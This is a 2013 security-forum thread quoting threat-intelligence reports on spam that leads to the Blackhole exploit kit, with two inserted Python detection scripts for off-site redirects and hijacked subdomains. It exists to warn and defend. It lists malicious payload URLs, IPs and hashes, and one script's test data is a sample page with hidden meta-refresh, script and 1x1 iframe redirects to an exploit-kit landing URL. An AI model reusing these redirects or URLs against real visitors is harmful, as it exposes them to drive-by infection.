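# Constructed page: three off-site redirect techniques plus two harmless references.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=http://dfudont.ru:8080/forum/links/column.php">
<script>window.location = "http://dfudont.ru:8080/forum/links/column.php";</script>
</head><body>
<iframe src="http://dfudont.ru:8080/forum/links/column.php" width="1" height="1"></iframe>
<a href="/about.htm">About</a>
<img src="http://static.example.org/logo.png">
</body></html>"""


class RedirectFinder(HTMLParser):
    """Collect (kind, url) for every construct that can send the visitor elsewhere."""

    def __init__(self):
        super().__init__()
        self.targets = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content") or "", re.I)
            if m:
                self.targets.append(("meta-refresh", m.group(1)))
        elif tag in ("iframe", "frame") and a.get("src"):
            self.targets.append((tag, a["src"]))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for location assignments with a literal URL.
        if self._in_script:
            for m in re.finditer(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", data):
                self.targets.append(("script-location", m.group(1)))


def offsite_redirects(html, own_host):
    """Return (kind, host, port, url) for each redirect/frame whose host is not own_host or a subdomain of it."""
    parser = RedirectFinder()
    parser.feed(html)
    own = own_host.lower()
    findings = []
    for kind, url in parser.targets:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if host and host != own and not host.endswith("." + own):
            findings.append((kind, host, parts.port, url))
    return findings


if __name__ == "__main__":
    for kind, host, port, url in offsite_redirects(SAMPLE_HTML, "www.judiciary.go.ke"):
        print(f"{kind}: off-site target {host}:{port} ({url})")
```

Relative targets and same-host redirects are deliberately ignored so the output is only the off-site destinations worth investigating; a destination on port 8080 with a path like /forum/links/column.php matches the exploit-kit landing URLs quoted throughout this thread.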


#862 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 22 January 2013 - 08:48 AM

FYI...

Blackhole exploit kit on avirasecureserver .com
- http://blog.dynamoo....oit-kit-on.html
22 Jan 2013 - "What is avirasecureserver .com? Well, it's not Avira that's for sure.. it is in fact a server for the Blackhole Exploit Kit*. This site is hosted on 82.145.57.3, an Iomart / Rapidswitch IP... There's also no company in the UK called QHoster Ltd. In fact, if we check the QHoster.com domain we can see that it is a Bulgarian firm... QHoster has an IP block of 82.145.57.0/25 suballocated to it. A quick poke around indicates not much of value in this range, you may want to consider blocking the /25 as a precaution."
(More detail at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=788732

- https://www.google.c...c?site=AS:20860
"Of the 18705 site(s) we tested on this network over the past 90 days, 1489 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-21... Over the past 90 days, we found 14 site(s) on this network... that appeared to function as intermediaries for the infection of 670 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s)... that infected 1080 other site(s)..."
___

'Droid malware spreads through compromised legitimate Web sites
- http://blog.webroot....mate-web-sites/
22 Jan 2013 - "... our sensor networks picked up an interesting website infection affecting a popular Bulgarian website for branded watches, which ultimately redirects and downloads premium rate SMS Android malware on the visiting user devices. The affected Bulgarian website is only the tip of the iceberg, based on the diversified portfolio of malicious domains known to have been launched by the same party that launched the original campaign...
Sample screenshot of the executed Android malware:
> https://webrootblog....pplications.png
... Sample malicious URLs displayed to Android users:
hxxp ://adobeflashplayer-up .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxxp ://googleplaynew .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxxp ://browsernew-update .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
... Detection rate for the malicious .apk files:
flash_player_installer.apk – MD5: 29e8db2c055574e26fd0b47859e78c0e * ... Android.SmsSend.212.origin.
Android_installer-1.apk – MD5: e6be5815a05c309a81236d82fec631c8 * ... HEUR:Trojan-SMS.AndroidOS.Opfake.bo.
... Upon execution, the Android sample phones back to gaga01 .net/rq.php – 93.170.107.57 – Email: mypiupiu1 @gmail.com transmitting..."
(More detail at the webroot URL above.)
* https://www.virustot...sis/1358799096/
File name: flash_player_installer.apk
Detection ratio: 5/46
Analysis date: 2013-01-21
** https://www.virustot...sis/1358799258/
File name: Android_installer-1.apk
Detection ratio: 5/46
Analysis date: 2013-01-21

> https://www.google.c...c?site=AS:57062
"Of the 2027 site(s) we tested on this network over the past 90 days, 23 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-22... Over the past 90 days, we found 75 site(s) on this network... that appeared to function as intermediaries for the infection of 104 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 496 site(s)... that infected 1485 other site(s)..."
___

Something evil on 109.123.66.30
- http://blog.dynamoo....1091236630.html
22 January 2013 - "109.123.66.30 (UK2.NET, UK) hosts several domains containing the Blackhole Exploit Kit (example here*). The domains in use are (mostly) legitimate hacked domains, but there are a couple of odd things here. Most of the malicious domains have a format like this: 700ff4ad03c655cb11919113011611137102708d4fb6daf0e74bea4aa5e8f9f.darkhands .com - in this case darkhands .com is a legitimate domain registered to an individual in Australia, but it has been hacked to create a whole load of malicious subdomains, hosted on another server from www.darkhands .com. In fact, almost all the domains are registered to Australians, but the key thing is that in all of those cases the main domains are hosted by OrionVM in Australia, with the main domains hosted in the 49.156.18.0/24 block. So how can the main (legitimate) sites be hosted in 49.156.18.0/24, but the malicious subdomains be hosted on a completely different network in the UK? I suspect that there is a compromise of some sort at OrionVM which has allowed the DNS records to be changed (it should be noted that these domains used several different registrars). Another oddity is that these hijacked domains only go from A to I alphabetically, which indicates that there might be some other malicious servers in this same group... Also hosted on 109.123.66.30 are some malicious .in domains that were previously on 87.229.26.138 (see here**)... It looks like there are some legitimate sites on the same server, but blocking 109.123.66.30 is probably a good idea."
(Long list of domains at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=796905

** http://blog.dynamoo....8722926138.html
___

Fake Swiss tax SPAM / africanbeat .net
- http://blog.dynamoo....s-tax-spam.html
22 Jan 2013 - "This Dutch-language spam appears to be from some Swiss tax authority, but in fact it leads to the Blackhole Exploit kit on africanbeat .net:
From: report@ ag .ch via bernina .co .il
Date: 22 January 2013 13:48
Subject: Re: je NAT3799 belastingformulier
Mailed-by: bernina .co .il
[redacted]
Wij willen brengen aan uw bericht dat je hebt fouten gemaakt bij het invullen van de meest recente belastingformulier NAT3799 (ID: 023520).
vindt u aanbevelingen en tips van onze fiscalisten HIER
( Wacht 2 minuten op het verslag te laden)
Wij verzoeken u om corrigeer de fouten en verzenden de gecorrigeerd aangifte aan uw belastingadviseur zo snel mogelijk.
Kanton Aargau
Sonja Urech
Sachbearbeiterin Wehrpflichtersatzverwaltung
Departement Gesundheit und Soziales
Abteilung Militär und Bevölkerungsschutz
Rohrerstrasse 7, Postfach, 6253 Aarau
Tel.: +41 (0)62 332 31 62
Fax: +41 (0)62 332 33 18

Translated as:
We want to bring to your notice that you have made mistakes when completing the most recent tax form NAT3799 (ID: 023520).
You can find recommendations and tips from our tax specialists HERE
(Wait 2 minutes for the report to load)
We ask you to correct the error and send the corrected report to your tax advisor as soon as possible.


The link leads to an exploit kit at [donotclick]africanbeat .net/detects/urgent.php (report here*) hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea)..."
(More at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=801678

:ph34r: <_<

Edited by AplusWebMaster, 22 January 2013 - 11:42 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
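The "Something evil on 109.123.66.30" item above describes a pattern worth checking for automatically: apex domains and their www hosts sit in one netblock (49.156.18.0/24), while newly created subdomains with long hexadecimal labels resolve to an unrelated server (109.123.66.30). The following is an added defender-side example, not code from the dynamoo post or any of the quoted blogs; every hostname in SAMPLE_RECORDS is constructed, the two address ranges are the ones named in the post, and BLOCK_RANGES is a hypothetical list built from the /25 and /21 the posts recommend blocking.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed passive-DNS style (hostname, A record) pairs. The two address
# ranges are the ones named in the post; every hostname is made up.
HEX_LABEL = "9c1e4f7a" * 8  # a 64-character hex label like the one quoted above
SAMPLE_RECORDS: List[Tuple[str, str]] = [
    ("example-au.com", "49.156.18.10"),
    ("www.example-au.com", "49.156.18.10"),
    ("mail.example-au.com", "49.156.18.11"),
    (f"{HEX_LABEL}.example-au.com", "109.123.66.30"),
    ("other-au.net", "49.156.18.42"),
    ("blog.other-au.net", "49.156.18.42"),
    ("shop.other-au.net", "203.0.113.7"),  # off-network but no hex label
    ("a1b2c3d4e5f60718293a4b5c6d7e8f90.other-au.net", "109.123.66.30"),
]

# Hypothetical blocklist built from the ranges the quoted posts recommend.
BLOCK_RANGES = ["82.145.57.0/25", "93.190.40.0/21"]

# A leftmost label of 24 or more hex characters is treated as hash-like.
HASHLIKE = re.compile(r"[0-9a-f]{24,}")


@dataclass(frozen=True)
class Finding:
    name: str
    ip: str
    reasons: Tuple[str, ...]


def apex_of(name: str) -> str:
    """Registrable domain, approximated as the last two labels.
    Simplification: does not handle multi-part public suffixes such as .co.il."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def hosting_networks(records) -> Dict[str, Set[ipaddress.IPv4Network]]:
    """Map each apex to the /24 networks its apex and www hosts resolve into.
    These are treated as the known-good hosting of the legitimate site."""
    nets: Dict[str, Set[ipaddress.IPv4Network]] = {}
    for name, ip in records:
        host = name.lower().rstrip(".")
        apex = apex_of(host)
        if host in (apex, "www." + apex):
            nets.setdefault(apex, set()).add(
                ipaddress.ip_network(f"{ip}/24", strict=False))
    return nets


def find_suspicious(records) -> List[Finding]:
    """Flag subdomains that resolve outside every network the apex uses.
    A hash-like leftmost label is recorded as an additional reason."""
    nets = hosting_networks(records)
    findings: List[Finding] = []
    for name, ip in records:
        host = name.lower().rstrip(".")
        apex = apex_of(host)
        if host in (apex, "www." + apex) or apex not in nets:
            continue  # apex/www define the baseline; an unknown apex cannot be judged
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in nets[apex]):
            continue  # same hosting as the legitimate site, nothing odd
        reasons = ["off-network"]
        if HASHLIKE.fullmatch(host.split(".")[0]):
            reasons.append("hashlike-label")
        findings.append(Finding(host, ip, tuple(reasons)))
    return findings


def block_candidates(findings) -> List[str]:
    """Distinct off-network IPs, sorted numerically, for blocklist review."""
    return sorted({f.ip for f in findings}, key=ipaddress.ip_address)


def blocked_by(ip: str, cidrs) -> Optional[str]:
    """Return the first CIDR in cidrs that contains ip, else None."""
    addr = ipaddress.ip_address(ip)
    for cidr in cidrs:
        if addr in ipaddress.ip_network(cidr):
            return cidr
    return None


if __name__ == "__main__":
    found = find_suspicious(SAMPLE_RECORDS)
    for f in found:
        print(f.name, f.ip, ", ".join(f.reasons))
    print("block candidates:", block_candidates(found))
```

The baseline is deliberately the apex and www hosts only, so a subdomain legitimately hosted elsewhere (a CDN, a mail provider) will also show as off-network without the hash-like reason; the two reasons together are the pattern the post describes.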


#863 AplusWebMaster


Posted 23 January 2013 - 07:28 AM

FYI...

Fake Intuit emails lead to Black Hole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 23, 2013 - "Cybercriminals are currently spamvertising tens of thousands of fake emails, impersonating Intuit, in an attempt to trick its customers and users into clicking on the malicious links found in the emails. Once users click on any of the links, they’re exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit, which ultimately drops malware on the affected hosts...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Malicious domain name reconnaissance:
dopaminko .ru – 212.112.207.15
Name server: ns1.dopaminko .ru – 62.76.185.169
Name server: ns2.dopaminko .ru – 41.168.5.140
Name server: ns3.dopaminko .ru – 42.121.116.38
Name server: ns4.dopaminko .ru – 110.164.58.250
Name server: ns5.dopaminko .ru – 210.71.250.131
More malicious domains are known to have responded to the same IP (212.112.207.15)...
Some of these domains also respond to the following IPs – 91.224.135.20; 46.175.224.21, with more malicious domains part of the campaign’s infrastructure..."
(More detail at the webroot URL above.)
___

Phishing Scam spreads via Facebook PM
- http://www.gfi.com/b...ia-facebook-pm/
Jan 23, 2013 - "We’ve seen a number of cases wherein phishers have used compromised Twitter accounts to send direct messages (DMs) to their followers. We’re now beginning to see this same tactic used in Facebook in the form of private messages (PMs), and this isn’t just some spam mail in your inbox claiming you have received a “private message”... Recipients can act on this message in two ways: they can click the link to confirm their account, or simply ignore the message and delete it from their message inbox. Users who do the latter are guaranteed to be safe from this sort of scam. Users who do the former, however, are led to a single site where they can enter all personal information asked from them... Unsolicited messages from phishers landing on your private message inbox are no longer limited to Twitter. Despite this old method being used in a different platform, our advice on how to avoid falling for such scams remain the same: Always check the URL to be sure you’re not going to visit a link that is completely unrelated to Facebook—”Think before you click”, remember?; be skeptical about messages claiming to have come from Facebook; lastly, never share the URL to anyone on Facebook or on your other social sites as this only increases the possibility of someone clicking the link and getting phished themselves."
(Screenshots available at the gfi URL above.)
___

Fake NACHA SPAM / canonicalgrumbles .biz
- http://blog.dynamoo....rumblesbiz.html
23 Jan 2013 - "... fake NACHA spam leads to malware on canonicalgrumbles .biz... The malicious payload is at [donotclick]canonicalgrumbles .biz/closest/984y3fh8u3hfu3jcihei.php (report here*) hosted on 93.190.46.138 (Ukrainian Hosting / ukrainianhosting .com). I've seen other malware servers in 93.190.40.0/21 before, I would recommend blocking the whole lot."
(More detail at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=814512
___

Bogus Job SPAM ...
- http://blog.dynamoo....imate-firm.html
23 Jan 2013 - "H Seal is a real, legitimate firm. This email is -not- from H Seal, but a criminal organisation wanting to recruit people for money laundering and other unlawful activities. Originating IP is 199.254.123.20 ..."
(More detail at the dynamoo URL above.)
___

Fake Corporate eFax SPAM / 13.carnovirious .net
- http://blog.dynamoo....viriousnet.html
23 Jan 2013 - "This spam is leading to malware on 13.carnovirious .net, a domain spotted earlier today... but one that has switched server to 74.91.117.49 since then... The spam leads to an exploit kit on [donotclick]13.carnovirious .net/read/persons_jobs.php hosted on 74.91.117.49 by Nuclear Fallout Enterprises. You should probably block 74.91.117.50 as well..."
(More detail at the dynamoo URL above.)
___

Fake USPS SPAM / euronotedetector .net
- http://blog.dynamoo....etectornet.html
23 Jan 2013 - "This fake USPS spam leads to malware on euronotedetector .net... The malicious payload is at [donotclick]euronotedetector .net/detects/updated_led-concerns.php hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which has been used in several recent attacks..."
(More detail at the dynamoo URL above.)
___

Fake BT Business SPAM / esenstialin .ru
- http://blog.dynamoo....nstialinru.html
23 Jan 2013 - "This fake BT Business spam leads to malware on esenstialin .ru... The malicious payload is on [donotclick]esenstialin .ru:8080/forum/links/column.php hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
91.224.135.20 (Proservis UAB, Lithuania)..."
(More detail at the dynamoo URL above.)
___

Something evil on 74.91.117.50
- http://blog.dynamoo....-749111750.html
23 Jan 2013 - "OK, I can see just two malicious domains on 74.91.117.50 but they are currently spreading an exploit kit through this spam run. The domain is allocated to Nuclear Fallout Enterprises who often seem to host malware sites like this, so there's a good chance that more evil will turn up on this IP.
These are the domains that I can see right now:
13.blumotorada .net
13.carnovirious .net
The domains are registered with these apparently fake details:
Glen Drobney office @glenarrinera .com
1118 hagler dr / neptune bch
FL 32266 US
Phone: +1.9044019773
Since there will almost definitely be more malicious domains coming up on this IP, it is well worth blocking."
___

Fake ADP SPAM / elemikn .ru
- http://blog.dynamoo....-elemiknru.html
22 Jan 2013 - "This fake ADP spam potentially leads to malware on elemikn .ru:
Date: Tue, 22 Jan 2013 12:25:06 +0100
From: LinkedIn [welcome @linkedin .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 815979361
Tue, 22 Jan 2013 12:25:06 +0100
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www .flexdirect .adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 286532564
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.


The malicious payload is at [donotclick]elemikn .ru:8080/forum/links/column.php but at the moment the domain does not seem to be resolving (which is a good thing!)
___

Fake "Batch Payment File Reversed" SPAM / kendallvile .com
- http://blog.dynamoo....ersed-spam.html
22 Jan 2013 - "This spam leads to malware on kendallvile .com:
From: batchservice @eftps .net [batchservice @eftps .net]
Date: 22 January 2013 17:56
Subject: Batch Payment File Reversed
=== PLEASE NOT REPLY TO THIS MESSAGE===
[redacted]
This notification was mailed to inform you that your payment file has Reversed. 2013-01-21-9.56.22.496135
Detailed information is accessible by sign into the Batch Provider with this link.
--
With Best Regards,
EFTPS
Contact Us: EFTPS Batch Provider Customer Service


This leads to an exploit kit on [donotclick]kendallvile .com/detects/exceptions_authority_distance_disturbing.php (report here*) hosted on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which should be blocked if you can."
* http://www.urlquery....t.php?id=802578

:ph34r: :ph34r: <_<

Edited by AplusWebMaster, 23 January 2013 - 02:21 PM.



#864 AplusWebMaster


Posted 24 January 2013 - 08:10 AM

FYI...

Fake Flash Updates - via SPAM attachment...
- http://www.gfi.com/b...ces-in-the-web/
Jan 24, 2013 - "Following the return of fake Google Chrome browser updates almost two weeks ago, online criminals are now banking on fake Adobe Flash Player updates to lure the unwary user into downloading malware onto their system... spam emails claiming to be from the Better Business Bureau (BBB) and eFax Corporate... The BBB email contains an attachment that is found to be a Pony downloader that, once opened, downloads a variant of the ZeuS banking Trojan onto the affected user’s system. The said downloader also steals various passwords related to FTP sites..."
(Screenshots available at the gfi URL above.)
___

Malicious BT SPAM
- http://www.gfi.com/b...ing-in-inboxes/
Jan 24, 2013 - "... if you’re a client of the BT (British Telecom) Group, be warned that there is a new spam campaign under the guise of a “Notice of Delivery” mail* pretending to originate from BT Business Direct... Once users download and open the attached HTM file, they are -redirected- to a Russian website the file calls back to. The website serves a Blackhole Exploit Kit, which then downloads Cridex once it finds a software vulnerability..."
* http://gfisoftware.t...attachment-spam
___

Fake ADP SPAM / 14.sofacomplete .com
- http://blog.dynamoo....ompletecom.html
24 Jan 2013 - "This fake ADP spam leads to malware on 14.sofacomplete .com:
From: Erna_Thurman @ADP .com Date: 24 January 2013 17:48
Subject: ADP Generated Message: Final Notice - Digital Certificate Expiration
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY. If you have any questions, please contact your administrator for assistance.
Digital Certificate About to Expire
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 1
Expiration date: Jan 25 23:59:59 GMT-03:59 2013
Renewing Your Digital Certificate
1. Go to this URL: https ://netsecure.adp .com/pages/cert/register2.jsp
2. Follow the instructions on the screen.
3. Also you can download new digital certificate at https ://netsecure.adp .com/pages/cert/pickUpCert.faces.
Deleting Your Old Digital Certificate
After you renew your digital certificate, be sure to delete the old certificate. Follow the instructions at the end of the renewal process.


The malicious payload is at [donotclick]14.sofacomplete .com/read/saint_hate-namely_fails.php hosted on 73.246.103.26 (Comcast, US). There will probably be other malicious domains on this same IP, so blocking it may be useful."
___

Fake LinkedIn emails lead to client-side exploits and malware
- http://blog.webroot....ts-and-malware/
Jan 24, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another massive spam campaign, impersonating LinkedIn, in an attempt to trick its users into clicking on the malicious links found in the bogus “Invitation Notification” themed emails. Once they click on the links, users are automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Name servers used by these malicious domains:
Name server: ns1.http-page .net – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: ns2.http-page .net – 7.129.51.158 – Email: ezvalue @yahoo .com
Name Server: ns1.high-grades .com – 208.117.43.145
Name Server: ns2.high-grades .com – 92.121.9.25
Sample malicious payload dropping URL:
hxxp ://shininghill .net/detects/solved-surely-considerable.php?vf=1o:31:1h:1l:2w&fe=33:1o:1g:1l:1m:1k:2v:1l:1o:32&n=1f&dw=w&qs=p
Upon successful client-side exploitation, the campaign drops MD5: fdc05614f56aca9421271887c1937f51 * ...Trojan-Spy.Win32.Zbot.ihgm.
Upon execution, the same creates the following process on the affected hosts:
%AppData%\Bytaa\yjdoly.exe
The following registry keys:
HKEY_CURRENT_USER\Software\Microsoft\Rekime
... Once executed, the sample also attempts to establish multiple UDP connections with the following IPs:
..."
(More detail at the webroot URL above.)
* https://www.virustot...5b58d/analysis/
File name: info.ex_
Detection ratio: 30/44
Analysis date: 2013-01-23
___

Fake pharma sites 24/1/13
- http://blog.dynamoo....ites-24113.html
24 Jan 2013 - "Here's an updated list of fake RX sites being promoted through vague spam like this:
Date: Thu, 24 Jan 2013 04:44:45 +0000 (GMT)
From: "Account Info Change" [noreply@etraxx.com]
Subject: Updated information
Attention please:
- Over 50 new positions added (view recently added products)
- Free positions included with all accounts (read more here)
- The hottest products awaiting you in the first weeks of the new year (read more here)
- We want you to feel as comfortable as possible while you're at our portal.
Click Here to Unsubscribe


As with a few days ago, these sites are hosted on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
Currently active spamvertised sites are as follows:
(Long list available at the dynamoo URL above.)
___

Fake Efax Corporate SPAM / epimarkun .ru
- http://blog.dynamoo....pimarkunru.html
24 Jan 2013 - "This fake eFax spam leads to malware on epimarkun .ru:
Date: Thu, 24 Jan 2013 04:04:42 +0600
From: Habbo Hotel [auto-contact@habbo.com]
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 963153883]
You have received a 28 pages fax at Thu, 24 Jan 2013 04:04:42 +0600, (157)-194-4168.
* The reference number for this fax is [eFAX-009228416].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.


There is an attachment called Efax_Corporate.htm leading to a malicious payload at [donotclick]epimarkun .ru:8080/forum/links/column.php which is hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
94.23.3.196 (OVH, France)
202.72.245.146 (Mongolian Railway Commercial Center, Mongolia)
These IPs and domains are all malicious:
..."

:ph34r: <_<

Edited by AplusWebMaster, 24 January 2013 - 05:07 PM.



#865 AplusWebMaster


Posted 25 January 2013 - 09:11 AM

FYI...

Chase Phish, LinkedIn, American Express Open and Verizon Wireless Spam
- http://www.gfi.com/b...-wireless-spam/
Jan 25, 2013 - "In this week’s Email Threats roundup, we are highlighting spam and phishing campaigns that have made a comeback, such as LinkedIn and Chase spam, but took advantage of different social engineering lures this time around. You Know It’s Awkward When… you receive an email notification that claims to originate from LinkedIn, saying you have an event invitation from one of your employees; however, (1) you don’t own a company and (2) you don’t have people under you that you can call “employees.” Furthermore, isn’t LinkedIn Events the latest thing-of-the-past?... these don’t matter now. What does matter is that recipients should not click any of the malicious links in the message body as they lead to serious system infections..."
- http://gfisoftware.t...edentials-phish
- http://gfisoftware.t...s-linkedin-spam
- http://gfisoftware.t...press-open-spam
- http://gfisoftware.t...n-wireless-spam
___

Fake Craigslist fax-to-email...
- http://techblog.avir...tifications/en/
Jan 25, 2013 - "If you receive such a message containing an HTML page attached, don't open it. The email pretends to come from "craigslist – automated message, do not reply <robot @craigslist .org>" and has the subject "Efax Corporate"...
> http://techblog.avir...fax-malware.jpg
... contains malicious JavaScript code which would download malware on your computer.
> http://techblog.avir...ist-malware.jpg ..."
___

Fake UPS SPAM / eziponoma .ru
- http://blog.dynamoo....ziponomaru.html
25 Jan 2013 - "This fake UPS spam leads to malware on eziponoma .ru:
From: messages-noreply @bounce .linkedin .com... On Behalf Of LinkedIn Password
Sent: 25 January 2013 04:12
Subject: UPS Tracking Number H0931698016
You can use UPS Services to:
Ship Online
Schedule a Pickup
Open a UPS Services Account
Welcome to UPS .com Customer Services
Hi, [redacted].
DEAR CLIENT , RECIPIENT'S ADDRESS IS WRONG
PLEASE PRINT OUT THE INVOICE COPY ATTACHED AND COLLECT THE PACKAGE AT OUR DEPARTMENT.
With Respect , Your UPS Customer Services...


The malicious payload is at [donotclick]eziponoma .ru:8080/forum/links/column.php which is hosted on:
94.23.3.196 (OVH, France)
195.210.47.208 (PS Internet Company, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)"
___

Fake FedEx SPAM / vespaboise .net
- http://blog.dynamoo....paboisenet.html
25 Jan 2013 - "This fake FedEx spam leads to malware on vespaboise .net:
Date: Fri, 25 Jan 2013 15:39:33 +0200
From: services @fedex .com
Subject: FedEx Billing - Bill Prepared to be Paid
FedEx Billing - Bill Prepared to be Paid
fedex.com
[redacted]
You have a new invoice(s) from FedEx that is prepared for discharge.
The following invoice(s) are ready for your overview:
Invoice Number
Invoice Amount
2-649-22849
49.81
1-181-19580
257.40
To pay or overview these invoices, please log in to your FedEx Billing Online account proceeding this link: http ://www.fedex .com/us/account/fbo
Note: Please do not use this email to submit payment. This email may not be used as a remittance notice. To pay your invoices, please visit FedEx Billing Online, http ://www.fedex .com/us/account/fbo
Thank you,
Revenue Services
FedEx
Please Not try to reply to this message. auto informer system cannot accept incoming mail.
The content of this message is protected by copyright and trademark laws under U.S. and international law.
review our privacy policy . All rights reserved.


The malicious payload is at [donotclick]vespaboise .net/detects/invoice_overview.php which is on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which has been used in several recent attacks... blocking it would be prudent."
___

Blackhole exploit kit - distribution
- http://www.symantec....new-spam-affair
Jan 24, 2013 - "... -redirect- ... to the following malicious URL:
dfudont .ru :8080/[REMOVED]/column.php...
BlackHole v2 exploit kit, and our telemetry data indicates that we have detected the following signatures from the malicious URL:
Web Attack: Blackhole Exploit Kit Website 8
Web Attack: Blackhole Exploit Kit
Web Attack: Blackhole Functions
Web Attack: Blackhole Toolkit Website 20
Web Attack: Blackhole Toolkit Website 31...
Heatmap distribution for IPS detections associated with Blackhole exploit kit:
> https://www.symantec...s/image4_26.png
... If the Blackhole exploit is successful, W32.Cridex* is then downloaded onto the compromised computer... ensure operating systems and software are up to date and to avoid clicking on suspicious links while browsing the Internet or checking email."
* W32.Cridex: https://www.symantec...-012103-0840-99
W32.Cridex!gen1: https://www.symantec...-032300-4035-99

- http://centralops.ne...ainDossier.aspx - Jan 25, 2013
canonical name dfudont .ru
addresses: 94.23.3.196, 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU
nserver: ns1.dfudont .ru. 62.76.185.169
nserver: ns2.dfudont .ru. 41.168.5.140
nserver: ns3.dfudont .ru. 42.121.116.38
nserver: ns4.dfudont .ru. 110.164.58.250
nserver: ns5.dfudont .ru. 210.71.250.131
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: FR
origin: AS16276
- https://www.google.c...c?site=AS:16276
"... over the past 90 days, 7886 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-25, and the last time suspicious content was found was on 2013-01-25... we found 458 site(s) on this network... that appeared to function as intermediaries for the infection of 3498 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1447 site(s)... that infected 6601 other site(s)..."
- http://centralops.ne...ainDossier.aspx - Jan 27, 2013
canonical name dfudont .ru
addresses: 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU ...
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: KZ - Kazakhstan
origin: AS48716
- https://www.google.c...c?site=AS:48716
"... over the past 90 days, 25 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-27, and the last time suspicious content was found was on 2013-01-27... we found 6 site(s) on this network... that appeared to function as intermediaries for the infection of 5 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 23 site(s)... that infected 965 other site(s)..."

:ph34r: :ph34r: <_<

Edited by AplusWebMaster, 27 January 2013 - 02:53 PM.



#866 AplusWebMaster


Posted 27 January 2013 - 06:55 AM

FYI...

Bogus BBB emails spread Zbot...
- http://www.hotforsec...-zbot-5135.html
Jan 25, 2013 - "... Better Business Bureau spam campaign.... the e-mails infect people with a Trojan that steals sensitive information from recipients... the BBB attack consists of a message supposedly from the Better Business Bureau telling recipients that a business customer has filed a formal complaint against them. The bogus e-mail invites the recipient to reply and mend the situation, but not before they open the attached document that, depending on the campaign, hides a downloader, a password stealer, and a BlackHole component. The subject line of these messages generally read: “complaint report,” “complaint ID,” “case” and a set of random digits. The bogus e-mails used in the January campaign carry as an attachment a zip file named “case” and arbitrary signs that hide a password stealer and a downloader of ZBot – identified by Bitdefender as Trojan.Generic.KD.835502. To make it more believable, attackers deliver the exe file with the Adobe Reader icon, so if file extensions are hidden by the operating system, chances are you’ll mistake it for a PDF document...
> http://www.hotforsec...der-of-ZBot.png
